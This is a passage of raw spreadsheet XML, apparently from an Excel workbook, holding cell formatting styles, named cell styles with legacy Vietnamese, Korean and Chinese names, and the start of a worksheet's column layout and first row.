      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="26" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="15" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="15" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="15" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="165" fontId="27" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="165" fontId="27" fillId="0" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="27" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="27" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="43" fontId="27" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="165" fontId="28" fillId="0" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="28" fillId="6" borderId="15" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="4" fontId="28" fillId="0" borderId="15" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="28" fillId="6" borderId="15" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="28" fillId="6" borderId="15" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="4" fontId="27" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="6" borderId="15" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="165" fontId="29" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="4" fontId="29" fillId="0" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="29" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="29" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="29" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="165" fontId="26" fillId="6" borderId="11" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="165" fontId="26" fillId="0" borderId="20" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="26" fillId="6" borderId="11" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="4" fontId="28" fillId="0" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="6" borderId="15" xfId="17" quotePrefix="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="27" fillId="6" borderId="11" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="4" fontId="27" fillId="0" borderId="20" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="27" fillId="6" borderId="11" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="4" fontId="27" fillId="0" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="179" fontId="26" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="15" xfId="17" quotePrefix="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="26" fillId="0" borderId="20" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="2" fontId="26" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="28" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="165" fontId="28" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="28" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="165" fontId="28" fillId="0" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="28" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="28" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="165" fontId="27" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="165" fontId="28" fillId="0" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="28" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="28" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="165" fontId="27" fillId="6" borderId="15" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="165" fontId="27" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="165" fontId="27" fillId="0" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="27" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="27" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="165" fontId="27" fillId="0" borderId="15" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="27" fillId="6" borderId="15" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="27" fillId="6" borderId="15" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="165" fontId="26" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="165" fontId="26" fillId="0" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="26" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="26" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="27" fillId="6" borderId="20" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="6" borderId="15" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="165" fontId="28" fillId="6" borderId="20" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="29" fillId="0" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="26" fillId="6" borderId="20" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="26" fillId="6" borderId="20" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="6" borderId="15" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="6" borderId="15" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="165" fontId="28" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="28" fillId="0" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="28" fillId="6" borderId="20" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="6" borderId="15" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="6" borderId="15" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="26" fillId="0" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="43" fontId="26" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="165" fontId="26" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="180" fontId="26" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="6" borderId="14" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="6" borderId="14" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="6" borderId="14" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="165" fontId="28" fillId="6" borderId="14" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="165" fontId="28" fillId="6" borderId="14" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="165" fontId="28" fillId="0" borderId="14" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="26" fillId="6" borderId="14" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="28" fillId="6" borderId="14" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="179" fontId="28" fillId="6" borderId="14" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="28" fillId="6" borderId="14" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="28" fillId="6" borderId="10" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="6" borderId="8" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="6" borderId="18" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="6" borderId="10" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="6" borderId="0" xfId="17" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="32" fillId="6" borderId="0" xfId="17" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="6" borderId="0" xfId="17" applyFont="1" applyFill="1"/>
    <xf numFmtId="165" fontId="26" fillId="6" borderId="17" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="165" fontId="28" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="26" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="3" fontId="26" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="26" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="0" xfId="17" applyFont="1" applyFill="1"/>
    <xf numFmtId="165" fontId="27" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="6" borderId="0" xfId="17" applyFont="1" applyFill="1"/>
    <xf numFmtId="165" fontId="28" fillId="6" borderId="15" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="28" fillId="6" borderId="15" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="6" borderId="0" xfId="17" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="165" fontId="28" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="165" fontId="27" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="27" fillId="6" borderId="15" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="26" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="3" fontId="28" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="3" fontId="28" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="3" fontId="26" fillId="6" borderId="15" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="26" fillId="6" borderId="14" xfId="17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="6" borderId="0" xfId="17" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="6" borderId="0" xfId="17" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="6" borderId="0" xfId="17" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="0" xfId="17" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="28" fillId="6" borderId="8" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="6" borderId="18" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="6" borderId="0" xfId="17" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="6" borderId="0" xfId="17" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="6" borderId="10" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="6" borderId="13" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="6" borderId="10" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="8" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="18" xfId="17" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
  </cellXfs>
  <cellStyles count="40">
    <cellStyle name="Comma" xfId="1" builtinId="3"/>
    <cellStyle name="Comma 2" xfId="2"/>
    <cellStyle name="Comma0" xfId="3"/>
    <cellStyle name="Currency0" xfId="4"/>
    <cellStyle name="Date" xfId="5"/>
    <cellStyle name="Fixed" xfId="6"/>
    <cellStyle name="Header1" xfId="7"/>
    <cellStyle name="Header2" xfId="8"/>
    <cellStyle name="Heading 1" xfId="9" builtinId="16" customBuiltin="1"/>
    <cellStyle name="Heading 2" xfId="10" builtinId="17" customBuiltin="1"/>
    <cellStyle name="Millares [0]_Well Timing" xfId="11"/>
    <cellStyle name="Millares_Well Timing" xfId="12"/>
    <cellStyle name="Moneda [0]_Well Timing" xfId="13"/>
    <cellStyle name="Moneda_Well Timing" xfId="14"/>
    <cellStyle name="n" xfId="15"/>
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
    <cellStyle name="Normal - Style1" xfId="16"/>
    <cellStyle name="Normal_BC KT - XH 6 thang dau nam 2009 cho UBND huyen2" xfId="17"/>
    <cellStyle name="Total" xfId="18" builtinId="25" customBuiltin="1"/>
    <cellStyle name=" [0.00]_ Att. 1- Cover" xfId="19"/>
    <cellStyle name="_ Att. 1- Cover" xfId="20"/>
    <cellStyle name="?_ Att. 1- Cover" xfId="21"/>
    <cellStyle name="똿뗦먛귟 [0.00]_PRODUCT DETAIL Q1" xfId="22"/>
    <cellStyle name="똿뗦먛귟_PRODUCT DETAIL Q1" xfId="23"/>
    <cellStyle name="믅됞 [0.00]_PRODUCT DETAIL Q1" xfId="24"/>
    <cellStyle name="믅됞_PRODUCT DETAIL Q1" xfId="25"/>
    <cellStyle name="백분율_95" xfId="26"/>
    <cellStyle name="뷭?_BOOKSHIP" xfId="27"/>
    <cellStyle name="콤마 [0]_1202" xfId="28"/>
    <cellStyle name="콤마_1202" xfId="29"/>
    <cellStyle name="통화 [0]_1202" xfId="30"/>
    <cellStyle name="통화_1202" xfId="31"/>
    <cellStyle name="표준_(정보부문)월별인원계획" xfId="32"/>
    <cellStyle name="표준_kc-elec system check list" xfId="33"/>
    <cellStyle name="一般_99Q3647-ALL-CAS2" xfId="34"/>
    <cellStyle name="千分位[0]_Book1" xfId="35"/>
    <cellStyle name="千分位_99Q3647-ALL-CAS2" xfId="36"/>
    <cellStyle name="貨幣 [0]_Book1" xfId="37"/>
    <cellStyle name="貨幣[0]_BRE" xfId="38"/>
    <cellStyle name="貨幣_Book1" xfId="3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Q158"/>
  <sheetViews>
    <sheetView tabSelected="1" zoomScale="84" zoomScaleNormal="84" workbookViewId="0">
      <pane xSplit="15" ySplit="13" topLeftCell="P14" activePane="bottomRight" state="frozen"/>
      <selection pane="topRight" activeCell="R1" sqref="R1"/>
      <selection pane="bottomLeft" activeCell="A14" sqref="A14"/>
      <selection pane="bottomRight" activeCell="R17" sqref="R17"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.140625" defaultRowHeight="15" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="4.5703125" style="209" customWidth="1"/>
    <col min="2" max="2" width="17.140625" style="210" customWidth="1"/>
    <col min="3" max="3" width="7.5703125" style="211" customWidth="1"/>
    <col min="4" max="4" width="10.5703125" style="211" hidden="1" customWidth="1"/>
    <col min="5" max="5" width="9.85546875" style="211" hidden="1" customWidth="1"/>
    <col min="6" max="6" width="8" style="187" hidden="1" customWidth="1"/>
    <col min="7" max="7" width="8.140625" style="187" hidden="1" customWidth="1"/>
    <col min="8" max="8" width="7.85546875" style="187" hidden="1" customWidth="1"/>
    <col min="9" max="9" width="8" style="187" hidden="1" customWidth="1"/>
    <col min="10" max="10" width="8.140625" style="187" hidden="1" customWidth="1"/>
    <col min="11" max="11" width="8.5703125" style="187" hidden="1" customWidth="1"/>
    <col min="12" max="12" width="7.7109375" style="187" hidden="1" customWidth="1"/>
    <col min="13" max="13" width="9.28515625" style="212" hidden="1" customWidth="1"/>
    <col min="14" max="14" width="9" style="187" customWidth="1"/>
    <col min="15" max="15" width="10.140625" style="187" customWidth="1"/>
    <col min="16" max="17" width="9.140625" style="187" hidden="1" customWidth="1"/>
    <col min="18" max="18" width="9.140625" style="187" customWidth="1"/>
    <col min="19" max="21" width="9.140625" style="187" hidden="1" customWidth="1"/>
    <col min="22" max="22" width="11" style="187" customWidth="1"/>
    <col min="23" max="23" width="11" style="187" hidden="1" customWidth="1"/>
    <col min="24" max="25" width="9.140625" style="187" hidden="1" customWidth="1"/>
    <col min="26" max="26" width="10.28515625" style="187" customWidth="1"/>
    <col min="27" max="27" width="10.28515625" style="187" hidden="1" customWidth="1"/>
    <col min="28" max="29" width="9.140625" style="187" hidden="1" customWidth="1"/>
    <col min="30" max="30" width="9.140625" style="187" customWidth="1"/>
    <col min="31" max="32" width="9.140625" style="187" hidden="1" customWidth="1"/>
    <col min="33" max="33" width="9.42578125" style="187" customWidth="1"/>
    <col min="34" max="34" width="9.42578125" style="187" hidden="1" customWidth="1"/>
    <col min="35" max="35" width="9.140625" style="187" hidden="1" customWidth="1"/>
    <col min="36" max="36" width="9.140625" style="187" customWidth="1"/>
    <col min="37" max="38" width="9.140625" style="187" hidden="1" customWidth="1"/>
    <col min="39" max="39" width="9.140625" style="187" customWidth="1"/>
    <col min="40" max="40" width="9.140625" style="187" hidden="1" customWidth="1"/>
    <col min="41" max="41" width="9.140625" style="187"/>
    <col min="42" max="42" width="0" style="187" hidden="1" customWidth="1"/>
    <col min="43" max="16384" width="9.140625" style="187"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:43" ht="20.25" customHeight="1">
      <c r="A1" s="215" t="s">
        <v>166</v>
      </c>
      <c r="B1" s="215"/>
      <c r="C1" s="215"/>
      <c r="D1" s="215"/>
      <c r="E1" s="215"/>
      <c r="F1" s="215"/>
      <c r="G1" s="215"/>
      <c r="H1" s="215"/>
      <c r="I1" s="215"/>
      <c r="J1" s="215"/>
      <c r="K1" s="215"/>
      <c r="L1" s="215"/>
      <c r="M1" s="215"/>
      <c r="N1" s="215"/>
      <c r="O1" s="215"/>
      <c r="P1" s="215"/>
      <c r="Q1" s="215"/>
